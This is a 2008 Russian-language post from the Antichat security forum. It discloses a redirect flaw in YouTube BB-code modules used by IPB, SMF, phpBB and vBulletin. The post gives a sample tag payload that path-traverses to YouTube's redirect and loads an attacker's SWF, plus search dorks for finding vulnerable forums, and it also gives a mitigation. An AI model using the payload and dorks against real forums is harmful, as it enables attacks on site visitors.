ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Vulnerability Youtube [BB Code]
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Vulnerability Youtube [BB Code]
  #1  
Старый 24.04.2008, 01:28
Аватар для ettee
ettee
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747

Репутация: 5170
По умолчанию Vulnerability Youtube [BB Code]
В составляющей части существующих модулей отсутствует проверка домена, что дает для атакующего возможность редиректа с помощью getURL.

PHP код:
youtube.com/v/[param_here]

$txt['youtube'] = 'YouTube'
Пример:
[youtube]../redirection?page=http://exploit.swf/[/youtube]

Получение активного редиректа:
PHP код:
http://www.youtube.com/v/../redirection?page=http://exploit.swf/ 
Присутствие модуля:
IPB
SMF
phpBB
vBulletin
etc

Воизбежание атаки рекомендуется использовать allowScriptAccess="never" / allownetworking="internal" / регулярное выражение.

dork:
BB Code : [yt] [/yt] /forum/
BB Code : [youtube] [/youtube] /forum/
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
YouTube будет следить за зрителями Out Мировые новости 8 29.03.2008 02:11
Windows Vulnerability Scanner 1.20 iddqd Soft - Windows 1 18.03.2008 05:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ